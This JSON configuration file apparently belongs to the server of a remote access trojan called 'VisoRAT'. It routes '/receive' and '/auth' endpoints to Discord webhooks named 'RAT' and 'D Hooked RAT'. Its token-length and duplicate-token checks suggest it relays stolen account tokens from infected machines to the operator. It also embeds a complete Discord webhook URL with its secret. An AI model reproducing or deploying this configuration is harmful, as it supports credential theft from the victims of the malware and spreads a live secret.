{
    "security": {
        "rate_limit_seconds": 600,
        "min_token_length": 128,
        "check_duplicate_tokens": true
    },
    "endpoints": {
        "/receive": {
            "webhooks": [
                {
                    "url": "https://discord.com/api/webhooks/1494990624796053615/XuTZrxKBW2_Z0pO2HR-2kMDabczO74jjP_jiVtJqIeeY8O4sn5R_Kjis3nUXtSRaqmBf",
                    "name": "D Hooked RAT",
                    "footer": "VisoRAT",
                    "color": 7414964,
					"avatar_url": "https://bigrat.monster/media/bigrat.jpg"
                },
                {
                    "url": "https://discord.com/api/webhooks/1494990624796053615/XuTZrxKBW2_Z0pO2HR-2kMDabczO74jjP_jiVtJqIeeY8O4sn5R_Kjis3nUXtSRaqmBf", 
                    "name": "RAT",
                    "footer": "VisoRAT",
                    "color": 7414964,
					"avatar_url": "https://bigrat.monster/media/bigrat.jpg"
                }
            ]
        },
        "/auth": {
            "webhooks": [
                {
                    "url": "https://discord.com/api/webhooks/1494990624796053615/XuTZrxKBW2_Z0pO2HR-2kMDabczO74jjP_jiVtJqIeeY8O4sn5R_Kjis3nUXtSRaqmBf",
                    "name": "Not D Hooked RAT",
                    "footer": "VisoRAT",
                    "color": 7414964,
					"avatar_url": "https://bigrat.monster/media/bigrat.jpg"
                }
            ]
        }
    }
}
